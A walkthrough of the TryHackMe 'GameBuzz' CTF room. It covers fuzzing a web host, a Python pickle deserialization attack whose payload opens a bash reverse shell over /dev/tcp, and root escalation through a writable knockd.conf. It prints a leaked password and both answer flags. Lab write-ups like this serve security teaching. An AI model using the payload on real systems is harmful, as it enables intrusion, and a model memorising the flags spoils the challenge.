Last Updated:
The image for [GameBuzz] - A TryHackMe CTF room
The image for [GameBuzz] - A TryHackMe CTF room TryHackMe

[GameBuzz] - A TryHackMe Walkthrough

Table of Contents

A Guide to the TryHackMe CTF room GameBuzz

[GameBuzz] is a CTF room by TryHackMe. It's difficulty is listed as Hard. And it's part of the Incognito 2.0 series which is featured on the platform. These rooms are fairly fun and created by the same author with similar themes. Let's get started.

Enumerate:

Nmap scan report for 10.10.129.236
Host is up, received reset ttl 61 (0.098s latency).
Scanned at 2022-05-18 14:55:44 EDT for 23s
Not shown: 998 closed tcp ports (reset)
PORT   STATE    SERVICE REASON              VERSION
22/tcp filtered ssh     port-unreach ttl 61
80/tcp open     http    syn-ack ttl 61      Apache httpd 2.4.29 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET OPTIONS HEAD
|_http-title: Incognito
|_http-server-header: Apache/2.4.29 (Ubuntu)
OS fingerprint not ideal because: Timing level 5 (Insane) used
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Adtran 424RG FTTH gateway (92%), Linux 2.6.32 (92%), Linux 2.6.39 - 3.2 (92%), Linux 3.1 - 3.2 (92%), Linux 3.11 (92%)
No exact OS matches for host (test conditions non-ideal).

Okay, so we see the basic services and begin a more thorough scan. Now, lets go ahead and add the IP to our local hosts file, so we can check for potential vhosts and subdomains. This domain name is listed in the contacts area at the bottom of the front page on the website. But. we assumed this fact based on previous experience with this series.

[GameBuzz] - TryHackMe - Walkthrough

While the thorough scan is running, we'll go ahead and try to enumerate further with a subdomain brute force. I chose the ffuf tool for this, which is not limited to only brute forcing subdomains. I do this by using the ffuf tool to fuzz the Host header parameter and repeatedly issuing GET requests to the main page, ignoring responses with the same file size as the default index page, like so:

ffuf -w /home/mootiny/resources/SecLists/Discovery/DNS/sortedcombined-knock-dnsrecon-fierce-reconng.txt -H "Host: FUZZ.incognito.com" -u http://incognito.com -fw 8853
[GameBuzz] - TryHackMe - Walkthrough

Our ffuf fuzz found the subdomain 'dev', so we'll add that to our hosts file as well.

[GameBuzz] - TryHackMe - Walkthrough

The home page at http://dev.incognito.com says 'Only for Developers' and nothing else. No references in the source or anything. Ironically, this is a good sign for us, perhaps there's an API or something lurking around here.. definitely more than just this. So, we continue to enumerate with the ffuf tool. Looking for sub directories this time (if it doesn't find any, we'd go hunting for files, but typically, people like a dashboard or something useful if they have a WWW front end.

ffuf -w /home/mootiny/resources/SecLists/Discovery/DNS/sortedcombined-knock-dnsrecon-fierce-reconng.txt -u http://dev.incognito.com/FUZZ

And our intuition/assumption doesn't fail us as we fine sub directories 'secret' and it's sub directory 'upload' (clearly this is an exciting end point for us as an attacker.. development environment, hidden upload directory.. should be some "loot" here, if not an entry point where we can get a foothold).

[GameBuzz] - TryHackMe - Walkthrough

Analysis:

There's one more clue we found from our thorough scan. If you click on the subscribe email link, it has your browser send an HTTP POST request in JSON format referencing a file named object.pkl (which is Python Pickle format).

[GameBuzz] - TryHackMe - Walkthrough
--- request ---

POST http://incognito.com/fetch HTTP/1.1
Host: incognito.com
Connection: keep-alive
Content-Length: 41
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.64 Safari/537.36
Content-Type: application/json
Origin: http://incognito.com
Referer: http://incognito.com/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

{"object":"/var/upload/games/object.pkl"}

--- response ---

HTTP/1.1 200 OK
Date: Wed, 18 May 2022 20:22:30 GMT
Server: Apache/2.4.29 (Ubuntu)
Vary: Accept-Encoding
Content-Encoding: gzip
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8

{"Game": "GTA5", "Rating": 9, "Review": "Nice"}

The actual response is a binary, but it's just a JSON file in Python Pickle format that breaks down to the content I decoded for you above. We're going to try a Python Pickle deserialization attack here and see if we can get RCE (our RCE payload will be a reverse shell, because of course it well). So, we'll go ahead and start a listener too.

Create malicious pickle binary using python:

$!/usr//bin/env python3
import pickle
import os
class pickleSerialization(object):
    def __reduce__(self):
        return (os.system,("bash -c 'bash -i >& /dev/tcp/<your IP>/5656 0>&1'",))
pickle.dump(pickleSerialization(), open("rev_shell", "wb"))
[GameBuzz] - TryHackMe - Walkthrough

Start our listener:

rlwrap ncat -lvnp 5656

Exploit:

Craft our request (this tool is called Fiddler, by the way.. it's pretty cool and lightweight. I prefer it over Burp and ZAP for some quick things.. obviously they have crazy useful plugins that aren't yet available for Fiddler):

[GameBuzz] - TryHackMe - Walkthrough

Note the parameters, likely some of them are required to get the request to fire. So, the easiest way to do this is to click the button again on the main page and have your proxy STOP the request and simply change the body content of the request to reference our own file and then send it on forward.

POST http://incognito.com/fetch HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.64 Safari/537.36
Host: incognito.com
Content-Length: 40
Content-Type: application/json
Connection: :keep-alive
Accept: :*/*
X-Requested-With: :XMLHttpRequest 
Origin: :http://incognito.com
Referer: :http://incognito.com/ Accept-Encoding:: gzip, deflate
Accept-Language: :en-US,en;q=0.9

{
    "object":"/var/upload/rev_shell"
}

[GameBuzz] - TryHackMe - Walkthrough

Escalate Privileges (or pivot, if needed):

Local Enumeration:

Now we're on to enumerating the host. Since we found two users, dev1 and dev2, one with read and execute access for world and one without, we're pretty sure we'll need to pivot from www-data over to dev2 before escalating to root. That's just the way these always work. However, if you know of a working kernel exploit, you can likely go ahead and pop root. (And good for you.)

Use which ever linux enumeration tool you like. But, first and foremost, I always like to poke manually. So, we saw SSH filtered before, lets look for a knockd.conf

cat /etc/knockd.conf
[options]
    logfile = /var/log/knockd.log

[openSSH]
    sequence    = 5020,6120,7340
    seq_timeout = 15
    command     = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
    tcpflags    = syn

[closeSSH]
    sequence    = 9000,8000,7000
    seq_timeout = 15
    command     = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j REJECT
    tcpflags    = syn

Wonderful.. now we can open the port if we ever get a chance to stabilize our shell. I also noticed some mail for the dev1 user and tried my luck to see if we could read it and luckily we could. It gave us his password, so we do get to stabilize our shell and even copy our SSH key over for ease in the future.. super easy.

www-data@incognito:/tmp$ cat /var/mail/dev1
cat /var/mail/dev1
Hey, your password has been changed, dc647eb65e6711e155375218212b3964.
Knock yourself in!
[GameBuzz] - TryHackMe - Walkthrough

This is great because we get to check sudo permissions if NOPASSWD: isn't set and if there's anything in there, it's pretty much good game, these days. Also, we ge to provide linpeas.sh with our sudo password and see what it comes up with. As well, there's a tool called traitor that I like to use for privesc that can do amazing things with a small amount of sudo access.

Local Analysis

What do you know? linpeas.sh found a gaping oversight on our behalf. Our old friend knockd.conf is writable and it has to run privileged, since it changes firewall rules.. so there's our in. As well, we can restart knockd with sudo privileges. So, this is obviously the intended path. (We didn't need your linux kernel 0day anyway, so there..)

Exploit Again (gain root/pwn):

Edit the config for /etc/knockd.conf to change the command from iptables to escalate your privileges (I chose to set uid on /bin/bash and copy it somewhere for any user)

/bin/bash -c "cp /bin/bash /tmp/f; chmod +x /tmp/f"
[GameBuzz] - TryHackMe - Walkthrough

Retstart the knockd service, so it will read the altered configuration:

sudo /etc/init.d/knockd restart 

Knock one more time and use our setuid copy of bash to become root:

[GameBuzz] - TryHackMe - Walkthrough

That'll be it for today. Have a good one you guys. Happy hacking!

Task 1  Challenge

Part of Incognito 2.0 CTF

Note- The machine may take about 5 minutes to fully boot.

Like my work, Follow on Twitter to be updated and know more about my work! (@0cirius0)

Answer the questions below

user.txt

d14def35ed0bd914c1c5881fa0fa8090

root.txt

9dcb607e31348671de36b9eb7446cb59

Comments